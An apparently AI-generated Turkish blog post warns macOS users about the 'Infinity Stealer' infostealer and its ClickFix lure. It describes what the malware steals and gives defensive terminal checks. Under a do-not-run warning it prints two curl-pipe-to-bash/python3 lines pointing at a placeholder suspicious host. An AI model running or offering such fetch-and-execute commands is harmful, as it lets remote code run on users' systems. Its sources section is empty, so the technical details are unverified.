macos kullanıcıları dikkat: infinity stealer denen yeni beladan korunma rehberi

Posted on 29 Mar 2026

arkadaşlar, macos dünyasında yeni bir misafir var: infinity stealer. python ile yazılmış, nuitka derleyicisiyle paketlenmiş bir bilgi hırsızı malware. “clickfix” denen kandırma yöntemiyle kurbanlarını avlıyormuş. mac kullanıyorum güvendeyim diyenlere gelsin, bu da sizin için.

ne oluyor yani?

şöyle ki, saldırganlar sahte hata mesajları göstererek kullanıcıları kandırıyor. “şu hatayı düzeltmek için bu komutu terminalde çalıştır” gibi bir şey söylüyorlar. klasik sosyal mühendislik. kullanıcı da “tamam düzeltelim” deyip kopyala-yapıştır yapınca, hop infinity stealer sisteme yerleşiyor.

spoiler: bu clickfix tekniği windows’ta da kullanılıyor, yeni bir şey değil aslında. ama macos için uyarlanmış versiyonunu ilk defa görüyoruz.

infinity stealer ne yapıyor?

agalar, bu malware sisteminize yerleştikten sonra şunları topluyor:

  • tarayıcı verileri: chrome, firefox, brave, edge gibi tarayıcılardan şifreler, çerezler, otomatik doldurma verileri
  • kripto cüzdan bilgileri: exodus, electrum, atomic wallet gibi cüzdanlarınızı tarıyor
  • sistem bilgileri: işletim sistemi versiyonu, donanım detayları
  • dosyalar: masaüstü, dökümanlar klasörlerindeki hassas dosyalar
  • ekran görüntüleri: evet, screenshot bile alıyor

toplanan veriler sıkıştırılıp saldırganlara gönderiliyor. yani klasik infostealer işi.

teknik detaylar

bu malware python ile yazılmış ama nuitka derleyicisi kullanılarak native executable haline getirilmiş. yani artık python yorumlayıcısına ihtiyaç duymuyor, doğrudan çalışıyor.

tespit oranı: virustotal’de ilk yüklendiğinde çok düşük tespit oranı varmış. yani antivirüsler pek yakalayamamış başta.

dağıtım yöntemi: sahte güncelleme sayfaları, phishing mailleri, sahte yazılım indirme siteleri üzerinden yayılıyor.

etkilenen sistemler

sistemdurum
macos (tüm versiyonlar)✅ etkileniyor
windows❌ bu varyant için hayır
linux❌ bu varyant için hayır

kendinizi nasıl korursunuz?

şimdi ne yapacaksınız:

1. terminalde random komut çalıştırmayın

dikkat: birisi size “şu hatayı düzeltmek için terminalde şunu çalıştır” diyorsa, önce iki kere düşünün. hele ki curl ile bir şey indirip bash’e pipe ediyorsanız, kesinlikle yapmayın:

# SAKIN BUNU YAPMAYIN:
curl http://şüpheli-site.com/script.sh | bash

# veya bunu:
curl -L http://şüpheli-site.com/fix.py | python3

2. gatekeeper’ı açık tutun

macos’un gatekeeper özelliği doğrulanmamış uygulamaları engelliyor. kapatmayın bunu:

# gatekeeper durumunu kontrol edin:
spctl --status

# açık olmalı, kapalıysa açın:
sudo spctl --master-enable

3. xprotect güncel mi kontrol edin

macos’un built-in antivirüsü xprotect. güncel olduğundan emin olun:

# sistem güncellemelerini kontrol edin:
softwareupdate -l

# varsa güncellemeleri yükleyin:
sudo softwareupdate -ia

4. şüpheli processleri kontrol edin

terminalde şunu çalıştırıp python processlerine bakın:

# python ile çalışan processleri listeleyin:
ps aux | grep -i python

# şüpheli bir şey görürseniz, process id'sini öğrenip kapatın:
# sudo kill -9 [PID]

5. tarayıcı verilerinizi koruyun

  • tarayıcınızda master password kullanın
  • mümkünse şifreleri tarayıcıda değil, 1password, bitwarden gibi şifre yöneticilerinde saklayın
  • düzenli olarak oturumları kapatın

6. kripto cüzdanlarınız varsa

  • hardware wallet kullanın (ledger, trezor)
  • hot wallet’larda büyük miktarda coin tutmayın
  • seed phrase’lerinizi offline saklayın

enfekte olduğunuzu nasıl anlarsınız?

şu belirtilere dikkat edin:

  • bilmediğiniz python processleri çalışıyor
  • ağ trafiğinde anormal artış var
  • cpu kullanımı sebepsiz yükseliyor
  • tarayıcı ayarlarınız değişmiş
  • bilmediğiniz uygulamalar yüklü

şüpheleniyorsanız:

# son yüklenen uygulamaları kontrol edin:
ls -lt /Applications | head -20

# launch agents'ları kontrol edin:
ls -la ~/Library/LaunchAgents/
ls -la /Library/LaunchAgents/

# cron job'ları kontrol edin:
crontab -l

enfekte olduysanız ne yapmalısınız?

  1. interneti kesin: wi-fi’yi kapatın, ethernet kablosunu çekin
  2. şifreleri değiştirin: başka bir cihazdan tüm önemli şifrelerinizi değiştirin
  3. kripto cüzdanlarınızı taşıyın: varsa coinlerinizi başka cüzdanlara transfer edin
  4. sistemi temizleyin:
    • malwarebytes for mac indirip tarama yapın
    • veya daha garantili yöntem: sistemi sıfırlayın (time machine yedekten geri yükleme)
# şüpheli dosyaları bulun:
find ~/Library -name "*infinity*" -o -name "*stealer*"
find /tmp -name "*.py" -mtime -7

# bulduklarınızı silmeden önce yedekleyin (analiz için):
# sonra silin
  1. bankalarınızı arayın: kredi kartı bilgileriniz çalınmış olabilir

genel öneriler

agalar, macos kullanıyorum güvendeyim dönemi bitti. artık macos için de ciddi malware’ler var. şunlara dikkat edin:

  • güncelleme yapın: hem sistem hem uygulamalar güncel olsun
  • yetkilendirmeye dikkat: bir uygulama admin şifresi istiyorsa, neden istediğini düşünün
  • indirme kaynaklarına dikkat: app store dışından bir şey indiriyorsanız, kaynağına güvenin
  • yedek alın: time machine ile düzenli yedek alın (ama enfekte sistemin yedeğini geri yüklemeyin)
  • iki faktörlü kimlik doğrulama: her yerde 2fa açın

edit: bu malware henüz çok yaygın değil ama yayılma potansiyeli var. özellikle kripto topluluğu hedef alınıyor, dikkatli olun.

edit 2: clickfix yöntemi genelde discord, telegram gibi platformlarda yayılıyor. “hesabınız askıya alındı, düzeltmek için şunu yapın” gibi mesajlara inanmayın.

kaynaklar

arkadaşlar, özetle: macos kullanıyorsanız da dikkatli olun. terminalde random komut çalıştırmayın, şüpheli linklere tıklamayın, güncelleme yapın. klasik güvenlik tavsiyeleri ama hala geçerli.

sorularınız varsa sorun, elimden geldiğince cevaplarım.

Bu içerik yapay zeka tarafından oluşturulmuştur.